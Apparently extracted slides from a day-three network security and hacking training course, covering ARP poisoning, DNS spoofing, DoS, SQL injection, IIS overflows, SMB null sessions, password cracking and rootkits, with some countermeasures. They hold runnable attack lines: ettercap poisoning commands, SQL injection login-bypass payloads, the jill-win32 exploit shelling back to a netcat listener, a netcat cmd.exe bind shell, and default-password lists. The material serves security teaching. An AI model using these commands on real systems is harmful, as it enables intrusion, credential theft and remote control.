day3 backup

Network Security

and Hacking Techniques

Day-3

Network Security and Hacking Techniques – DAY-3

Typical Network- Hacking Techniques

“The Linux Based Services that Mean Business Securing Internet”

Visible IP

Address

InternalNetwork

PC Servers

Linux and windows

HostApplication Servers

Like IDS,Sniffers

I Want these systems


Network-Level Attacks

ARP Refresher

Sniffing Attacks

Sniffing Detection

Ettercap Example

DNS Cache Poisoning

Denial of Service Attacks


ARP Refresher

ARP Message Formats ARP packets provide mapping between hardware layer and

protocol layer addresses

28 byte header for IPv4 ethernet network

8 bytes of ARP data

20 bytes of ethernet/IP address data

6 ARP messages ARP request and reply

ARP reverse request and reply

ARP inverse request and reply


Gathering and Parsing Packets (Cont..)

IP Address Spoofing Variations


ARP Request Message

Source contains initiating system’s MAC address and IP address

Destination contains broadcast MAC address ff.ff.ff.ff.ff.ff


ARP Reply Message

Source contains replying system’s MAC address and IP address

Destination contains requestor’s MAC address and IP address


Unsolicited ARP Reply

Any system can spoof a reply to an ARP request

Receiving system will cache the reply

Overwrites existing entry

Adds entry if one does not exist

Usually called ARP poisoning


Types of Attack

Sniffing Attacks

Session Hijacking/MiM


Sniffing on a Hub

CIS COSYS TEMS

Sniffer Source Destination

Hub


Host to Host Exploit

Spoofed ARP ReplyC

Real ARP Reply

Broadcast ARP Request

Spoofed ARP ReplyS

Client (C) Server (S) Hostile


Host to Router Exploit

Real ARP Reply

Broadcast ARP Request

CISCOSYSTEMS

Spoofed ARP ReplyC

Spoofed ARP ReplyR

Client (C) Gateway Router (R) Hostile


Relay Configuration

M-1 M-3

0:c:3b:9:4d:8- 10.1.1.70:c:3b:1c:2f:1b- 10.1.1.2

0:c:3b:1a:7c:ef- 10.1.1.7 0:c:3b:1a:7c:ef- 10.1.1.2

0:c:3b:1a:7c:ef- 10.1.1.10

Attacker


Relay Configuration (cont.)

CISCOSYSTEMS

Sniffer Source Destination

Switch


Detection

OS Level Detection

Operating System

OS Level Detection Detection

Windows 95 NO

Windows 98 NO

Windows NT NO

Windows 2000 NO

Linux RedHat 7.0 NO

FreeBSD 4.2 YES


Hypothetical Detection Application

Purpose

Track and maintain ARP/IP pairings

Identify non-standard ARP-replies versus acceptable ones

• Timeout issues

OS must withstand corruption itself

Fix broken ARP entries of systems

• Transmission of correct ARP replies


Tools and Utilities

Manipulation

Dsniff 2.3

Hunt 1.5

Growing number of others

Local monitoring

Arpwatch 1.11


Tools - ARP Spoofing

Windows

Ettercap

Unix

Dsniff

Hunt


Ettercap

To start C:\ettercap –i dev1

• Try dev0, dev1, dev2, etc., until it finds your Ethernet adapter

• It takes a long time to scan the network


Ettercap Sniffing Options

Usage: ettercap [OPTION] [HOST:PORT] [HOST:PORT] [MAC] [MAC]

Sniffing method:

-a, --arpsniff ARPBASED sniffing (specifying two hosts)

SMARTARP (specifying one host but with the list

PUBLICARP (specifying only one host silently)

in silent mode : must specify both IP and MAC

i.e.: ettercap -Nza IP IP MAC MAC (ARPBASE

ettercap -Na IP MAC (SMARTARP

ettercap -Nza IP MAC (PUBLICAR

-s, --sniff IPBASED sniffing

you can specify the ANY ip that means ALL hosts

e.g.: ettercap -Nzs ANY:80 (sniff only http)

-m, --macsniff MACBASED sniffing

e.g.: ettercap -zm MAC1 MAC2

ettercap -Nm MAC

Off Line Sniffing:

-T, --readpcapfile OFFLINE sniffing (read packets from a file)

e.g.: ettercap -T file_dumped_from_tcpdump

-Y, --writepcapfile DUMP packets to a pcap compatible file format

e.g.: ettercap -NzsY file_to_be_dumped


Spoofing example with Ettercap HOST 1 telling that 10.1.1.7 is on 0:c:3b:1a:7c:ef

HOST 2 telling that 10.1.1.2 is on 0:c:3b:1a:7c:ef

(C:\ettercap –a 10.1.1.2 10.1.1.7 0:c:3b:1c:2f:1b 0:c:3b:9:4d:8)

now they are poisoned !! they will send their packets to us ! Then if we receive packets from:

HOST 1 we will forward to 0:c:3b:9:4d:8

HOST 2 we will forward to 0:c:3b:1c:2f:1b

M-1 M-30:c:3b:9:4d:8- 10.1.1.70:c:3b:1c:2f:1b- 10.1.1.2

0:c:3b:1a:7c:ef - 10.1.1.7 0:c:3b:1a:7c:ef - 10.1.1.2

0:c:3b:1a:7c:ef- 10.1.1.10Attacker


Bibliography

Finlayson, Mann, Mogul, Theimer, RFC 903 “A Reverse Address Resolution Protocol,” June 1984

Kra, Hunt 1.5, http://www.gncz.cz/kra/index.html, Copyright 2000

Lawrence Berkeley National Laboratory, Network Research Group, Arpwatch 1.11, ftp://ftp.ee.lbl.gov/arpwatch.tar.Z, Copyright 1996

Plummer, David C., RFC 826 “An Ethernet Address Resolution Protocol,” November 1982

Russel, Ryan and Cunningham, Stace, “Hack Proofing Your Network,”, Syngress Publishing Inc, Copyright 2000

Song, Dug, Dsniff 2.3, http://www.monkey.org/~dugsong/, Copyright 2000


Network-Level Attacks(Cont…)

Packet Sniffing:

Packet sniffer is a piece of software that grabs all of the traffic flowing

Dsniff –n –i 1


DNS Cache Poisoning

DNS Cache Poisoning

DNS ID Spoofing

DNS Hides Poisoning


DNS Cache Poisoning - TOOL

http://www.securiteinfo.com/download/wds.zip

This tool is a simple DNS ID Spoofer for Windows 9x/2K

the MAC address of the DNS server (or the default gateway if the DNS server is in another network).

Usage : wds -h

Example : wds -n www.microsoft.com -i 216.239.39.101 -g 00-00-39-5c-45-3b


Gathering and Parsing Packets (Cont..)

The ARP Cache poisoning:



DoS attacks are as old as the Internet itself

Year 2000 when a complete new quality of DoS attack started (DDoS).

(DDoS) stroke a huge number of prominent web sites including Yahoo, Ebay, Amazon and Buy.com

DDoS Concepts: Distributing the attack across several hosts. Coordinating the attack among many machines. Using the distribution system to thwart all attempts of discovering the origin of the attack.



TCP Connections


Denial of Service Attacks (Cont…)

Abusing TCP: The Traditional SYN Flood


“Smurf”

Internet

Perpetrator V ictim

IC M P echo (spoofed source address of vic tim )Sent to IP broadcast address

IC M P echo reply



The Development of Bandwidth Attacks



DOS



DDOS



Distributed Reflection DOS



Packet path diffusion



Diffusing the path


Prevention Techniques

Ingress Filtering

Deployed by ISP's to drop packets with IP addresses outside the range of a customer’s network, so that they can prevent attackers from using forged source addresses to launch a DoS attack.

Egress Filtering

Prevents one’s network from being the source of forged communications used in DoS attacks.


Web Application Attacks

Introduction

Hacking Windows 2000: A Sample

SQL Injection: Manipulating Back-end Databases

Cross-Site Scripting


The Hacking Exposed Philosophy

“The most important step

towards securing your network

Is trying to break into it.”


Background

Most “script kiddies” will attack the OS and web server service.

They scan for web ports, search for vulnerabilities, and then attack.

The more sophisticated attacker will attack the custom application running on the web server.


Hacking Step 1: Scanning…

Step1: Using NMAP or Any port Scanner, he will find the ports are opened on those network and what application is running on those ports


Hacking Step 2: Vulnerability Scanning…

Web vulnerability scanners check for known holes.

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items

#nikto.pl -h 206.135.57.178

-- nikto / v1.4.0 / rain forest puppy / www.wiretrip.net --

- Loaded script database of 1968 lines

= - = - = - = - = - =

= Host: 206.135.57.178

= Server: Apache/1.3.20 (Unix)

- www.apache.org

+ 404 Not Found: GET /cfdocs/

- Directory index: /scripts/

+ Found: GET /scripts/cfcache.map

+ 404 Not Found: GET /cfcache.map

+ 404 Not Found: GET /cfide/Administrator/startstop.html


Hacking Step 2: Vulnerability Identification

Search Internet for current vulnerabilities

http://www.google.com

http://www.securityfocus.com

http://www.packetstormsecurity.com/


Vulnerability Identification

www.SecurityFocus.com

Vulnerabilities by vendor

Vulnerabilities by BID

www.securityfocus.com/bid/<bid #>


Vulnerability Identification

www.packetstormsecurity.com Useful directory of site

http://packetstormsecurity.com/windows2000/


Hacking Windows 2000

More recently, the most effective way to compromise a Windows NT/2000 system is via Internet Information Server (IIS)

IIS is installed by default, listens on TCP 80; many don’t realize it’s there (and vulnerable…)

Those who run their Website on IIS can’t just block access to it

Windows 2000 ships with IIS version 5 (IIS5) Microsoft’s flagship Webserver has a long history of

security flaws It is debatable whether these flaws are more prevalent

in Microsoft code, or whether Microsoft’s code is simply more prevalent

(Yes, we’ll talk about Gartner later…)


Top Five Windows 2000 IIS Threats

Remote Command Execution Via Internet Printing Service

Microsoft IIS CGI Filename Decode Error Vulnerability

Remote command execution via Buffer Overflow in Indexing Service

Unauthorised SMTP relaying

Buffer Overflow i n FrontPage server extension


Remote Command Execution Via Internet Printing Service

Internet Printing is a new feature in Windows, introduced with the release of Windows 2000 Server.

It provides users with the ability to access a printer across an Intranet or the Internet and submit a job directly to the printer through the browser.

This functionality is enabled by default

The vulnerability exists in an unchecked buffer in the msw3prt.dll, allowing an attacker to post a string of approximately 420 characters that will cause the buffer to overflow and commands to be overwritten with the newly injected shell code.


IIS Buffer Overflows: IPP

Simple to exploit:

GET /null.printer HTTP/1.0

Host: [> 420 char. buffer]



Published exploits:

jill-win32.exe by dark spyrit

Iis5hack.exe by hsj

Remotely exploits buff. overflow, inserts shellcode to “shell” back to a listener on attacker’s system

Evil…


IPP Buffer Overflow DEMO

IPP Buffer Overflow DEMO

Start netcat listener on attacker’s system

nc –vv –l –p 23

Execute jill-win32:

jill-win32 victim 80 attacker 23

Shell pops up on attacker’s machine, SYSTEM context


Practicals

Try to compromise your server


SQL Scanning

TCP port 1433

SQL Server defaults to listen on these ports since ip-sockets net-lib is installed by default (along with named pipes)

UDP port 1434

Thanks to multiple instancing, having to know the exact port is not needed to connect since the net-libs will be more than happy to auto-connect you to the instance


SQL Scanning (cont.)

Starting nmapNT V. 2.53 SP1 by [email protected]

eEye Digital Security ( http://www.eEye.com )

based on nmap by [email protected] ( www.insecure.org/nmap/ )

Interesting ports on (10.6.6.205):

(The 1507 ports scanned but not shown below are in state: closed)

Port State Service

21/tcp open ftp

25/tcp open smtp

80/tcp open http

88/tcp open kerberos-sec

135/tcp open loc-srv

139/tcp open netbios-ssn

389/tcp open ldap

443/tcp open https

445/tcp open microsoft-ds

464/tcp open kpasswd5

593/tcp open http-rpc-epmap

636/tcp open ldapssl

1026/tcp open nterm

1080/tcp open socks

1433/tcp open ms-sql-s -------

3389/tcp open msrdp


SQL Server Discovery

Multiple instancing capabilities of SQL Server 2000 make enumeration a functional requirement

A specially formed UDP packet directed at port 1434 will cause the SQL 2K listener service to divulge information about every instance of SQL Server running on that machine

Packet Information

• Instance names

• Net-libs supported

• TCP ports and pipe names

• Clustering support (juicy targets)


Broadcast Discovery

Since the listener may exist on multiple machines, it is possible to send a broadcast UDP packet to port 1434 to discover all instances of SQL Server 2000 on a subnet

sql –L (will return a raw listing)

Capture returned packets

Analyze


SQL Server Discovery

The following is a sample response from a SQL Server to the UDP broadcast:

(Captured using Snort-1.6.3 – http://www.snort.org)

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] SQL Server Reply [**]

12/22-14:18:22.320099 10.6.7.37:1434 -> 10.6.6.194:4412

UDP TTL:128 TOS:0x0 ID:15054

Len: 133

.z.ServerName;DEV-REPORT2;InstanceName;MSSQLSERVER;IsClustered;N

o;Version;8.00.194;tcp;1433;np;\\DEV-REPORT2\pipe\sql\query;;

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


SQLPing Utility

Directs a custom udp packet at a specific target or subnet and enumerates the server info across multiple instances

Listening....

ServerName:LANDROVER

InstanceName:SQL2K

IsClustered:No

Version:8.00.194

tcp:1241

np:\\LANDROVER\pipe\MSSQL$SQL2K\sql\query

ServerName:LANDROVER

InstanceName:MSSQLServer

IsClustered:No

Version:7.00.623

np:\\LANDROVER\pipe\sql\query

tcp:1433

rpc:LANDROVER

http://www.sqlsecurity.com/utils/sqlping.zip


SQL Code Injection

Ability of an attacker to inject unintended SQL statements into application

Consequences

• Exposure of sensitive data

• SQL privilege escalation

• OS access

• COM+ access


Scope of SQL Injection

SQL injection attacks rarely alerts IDS systems especially over SSL

Difficult to track down all the areas of exploitation since the only real solution is manual code review

No amount OS security, firewalls, patch diligence will stop SQL injection.

The solution is good coding practices


SQL Injection Sample

ASP Code

<%

Set Conn =

Server.CreateObject("ADODB.Connection")

Conn.open “dsn=myapp;uid=sa;pwd=45nf3k332fhj“

Set RS = Conn.Execute("SELECT * from users where username=‘" & username & “’ AND password=‘“ & password & "’" )

%>


SQL Injection Example 1

Normal login

SQL Server sees

• select * from users where username=‘bob’ and password=‘b2oQeDr!’

• All is well (or so it seems)

Login Page

UserName: bob

Password: b2oQeDr!



Malicious Login

SQL Server sees• select * from users where username=‘bob’ and

password=‘’ union select * from users where admin=1

• In this case the user logs in as the site administrator

Login Page

UserName: bob

Password: ‘ union select * from users where admin=1—



Normal usage

Notice that on a search page we get immediate feedback – good target for injection

Also, since we see three columns we can assume that’s all the SQL statement is selecting

User SearchEnter Last Name : andrewsResults:Last First emailAndrews, chip [email protected]



Malicious Usage

User Search

Enter Last Name : ‘ union select ’’,’’,@@version

Results:

Last First emailMicrosoft SQL Server 2000

- 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 1)


SQL Injection Samples

Problems

Poor input validation

Secret in ASP code (source code disclosure)

Poorly typed – SQL server and ASP not checking data-types

Security context too high for needed functionality


Best Practices

Use principle of least-privilege

Assign MSSQLServer service non-administrator user context

Take the time to properly implement trusted security (Integrated Mode)

Don’t place passwords in script

Assign complex ‘sa’ password even when using Integrated security

Consider dropping certain procedures in the interest of security. They can always be added later.


Operating System and Application-Level Attacks

Password Cracking With L0phtCrack

NetBios/SMB Hacking

Buffer Overflows in Depth

Examples of remote root exploit through buffer overflow

Root Kits


NetBios/SMB Hacking

Introduction

SMB/NetBios Explained and Exploited

Win2k Architecture

Network and Host Enumeration

Penetration

Pillaging Hosts

Escalation

Summary and Wrap-up



SMB is Server Message Blocks

A protocol over NetBios or TCP

Used for “net use” type communications

• UDP port 137 (name services)

• UDP port 138 (datagram services)

• TCP port 139 (session services)

NT uses port 139

Win2k uses ports 139 and/or 445



Mapping a drive syntax will prompt for password

Null Session is no user with no password Access to TCP 139, 445, IPX, or NetBEUI

Null session not meaningfully logged

Normal part of other network operations

Hackers can use to enumerate network

net use * \\target\share */user:domain\username

net use \\target\share “” /user:””


Host Enumeration

Just to reiterate… We are connecting with aBLANK username and a BLANK password

This functionality is enabled by default on NT/2000 (port 445 also)

This is one of the most debilitating vulnerabilities faced by NT/2000 deployments of all sizes!!!!

This connection is not logged in the Event Log, nor is it recorded by a majority of the Host Based IDS products


Penetration

The primary goal is to authenticate ourselves to the remote host. We can do this by:

Guessing username / password combinations,

Obtaining the user hashes, or

Exploiting a vulnerable service


Password Guessing

Guessing Username/Password combinations:

Review results from DumpSec output

Identify those that:

• haven’t changed their passwords recently

• haven’t logged on recently

• are members of the admin group

• may be a shared group account

• are lab or test accounts

• have juicy info in the comment field


Guessing Passwords

NT/2000 does not support logging on with multiple credentials simultaneously, so:

Log off as null session user:

net use * /del

Attempt to logon as target user:

net use \\target\ipc$ * /user:target\username


Password Guessing

High Probability Combinations: administrator blank, password, administrator

arcserve arcserve, backup

test test, password

lab lab, password

username username, company_name

backup backup

tivoli tivoli

symbiator symbiator, as400

backupexec backup


enum Brute Force Features

usage: enum [switches] [hostname|ip]

-U: get userlist

-M: get machine list

-N: get namelist dump (different from -U|-M)

-S: get sharelist

-P: get password policy information

-G: get group and member list

-L: get LSA policy information

-D: dictionary crack, needs -u and -f

-d: be detailed, applies to -U and -S

-c: don't cancel sessions

-u: specify username to use (default "")

-p: specify password to use (default "")

-f: specify dictfile to use (wants -D)


enum Brute Force Features


Password Guessing

Countermeasures

Enable lockout for all accounts

Use passprop to enable Admin lockout (remote only, not TS)

Enforce password policy (passfilt, KB Q161990, W2K Account Policy)

Audit logon/logoff failures

Treat the Administrator and Domain Admins accounts as holders of the keys to the kingdom – they are!


Sniffing Password Data

NT/2000 uses a challenge/response authentication mechanism

Neither passwords nor their hashes are sent across the wire

However, The L0pht discovered a way to extract hashes from the logon exchange

SMB Packet Capture

L0pht Crack (2.52) works on an NT4 machine but does not work on Win 2000

Version 3 incorporates a new packet driver that works?[not yet] on Win 2000

ScoopLM from SecurityFriday does work on Win2k


Sniffing Passwords..L0pht


Sniffing Passwords..ScoopLM


Cracking Passwords

Once you’ve obtained password hashes, there’s no good reason not to start cracking them immediately

Several tools have been written to optimize this process

The best are: L0phtcrack

John the Ripper

BeatLM for use with ScoopLM


Cracking Passwords

L0phtcrack


Cracking Passwords

John the Ripper Version 1.6 Copyright (c) 1996-98 by Solar Designer

Usage: john [OPTIONS] [PASSWORD-FILES]

-single "single crack" mode

-wordfile:FILE –stdin wordlist mode, read words from FILE or stdin

-rules enable rules for wordlist mode

-incremental[:MODE] incremental mode [using section MODE]

-external:MODE external mode or word filter

-stdout[:LENGTH] no cracking, just write words to stdout

-restore[:FILE] restore an interrupted session [from FILE]

-session:FILE set session file name to FILE

-status[:FILE] print status of a session [from FILE]

-makechars:FILE make a charset, FILE will be overwritten

-show show cracked passwords

-test perform a benchmark

-users:[-]LOGIN|UID[,..] load this (these) user(s) only

-groups:[-]GID[,..] load users of this (these) group(s) only

-shells:[-]SHELL[,..] load users with this (these) shell(s) only

-salts:[-]COUNT load salts with at least COUNT passwords only

-format:NAME force ciphertext format NAME (DES/BSDI/MD5/BF/AFS/LM)

-savemem:LEVEL enable memory saving, at LEVEL 1..3


Cracking Passwords

Countermeasure

Enforce password length of exactly 7 characters

All passwords should meet complexity minimums, such as different case, numerals, and punctuation


Get Interactive Overview

If we are truly to become the machine there are certain things we must do

Firstly, copy up our Admin Kit

Second, is to gain an interactive shell

Last is to prepare target machine in order to launch further attacks


Get Interactive

Map to a drive on the target host and copy over the followin files:

fscan

Netcat

Local

Global

Pwdump2,3

Remote

Lsadump2

Cp

DumpSec

Getmac

Netdom

Nltest


Get Interactive : REMOTE.EXE

Launch remote.exe on the target host

Syntax: remote /s “cmd.exe” [secret]

Connect to remote pipe

Syntax remote /c hostname [secret]


Get Interactive : NC.EXE

Netcat syntax on remote host: nc –l –d –p 2002 –e “cmd.exe”

Netcat syntax to connect to listener nc –n –v target_ip 2002

This is the preferable method, but it only works

over IP. Great when 139 is blocked.



Buffer Overflows in Depth

Buffer Overflow Exploit

In general, buffer overflow attack involves the following steps:

i. stuffing more data into a buffer than it can handle

ii. overwrites the return address of a function

iii.switches the execution flow to the hacker code



Process Memory Region


RootKit

Root Kits

Rootkit name are combination from two words, root and kit

Collection of tools that enable attacker to keep the root power

Type of Rootkit

Application rootkit - established at the application layer.

Kernel rootkit - establish more deep into kernel layer.


Application Rootkit

Programs replace to hide attacker presence.

Examples ls,ps,top,du,find,ifconfig,lsof

Network Daemons with backdoor

Sniffer Program

Kernel Rootkit

Hiding processes.

Hiding files

Hiding the sniffer.

Hiding the File System

RootKit (Cont…)


NT Rootkit

Process hiding


NT Rootkit

File hiding


NT Rootkit

Rootkit console with Keyboard sniffing


Detecting hidden processes

Two Software


Anonymity on the web

Anonymity and the Internet

Anonymizing proxy

Case Studies – Anonymity WebSite

Case Studies – Anonymity Softwares

Questions



Anonymity: the state of being unknown or unfamiliar

Sometimes it is important for one’s identity to remain anonymous

Why might individuals want their identity to remain anonymous?

People generally do not like to be tracked without their knowledge. The average web surfer and Internet hacker wishes to remain anonymous.



There are many ways user information can be discovered.

An individual’s location or identity can be determined using “cookies” and/or an IP address

Cookie: a small piece of information that a server stores on the user’s computer. Example: a yellow pages site

IP address: a series of four numbers which uniquely identify your computer on the Internet. Example: 129.186.1.201

ISP’s keep track of the IP addresses their customers use, and may also keep records of names and pseudonyms


Anonymizing proxy

Acts as a proxy for users

Hides information from end servers

Sees all web traffic

Free and subscription services available

Some free services add advertisements to web pages

ProxyBrowserEnd

Server

Request Request

ReplyReply


Case Studies – Anonymity WebSite

Anonymizer.com

Proxify.com


Case Studies – Anonymity Software

JAP

It is integrated

with Browser


Case Studies – Anonymity Software

HopsterBypass Firewall, Bypass Proxy


Anonymity on the web

Questions ??

day3 backup

Technology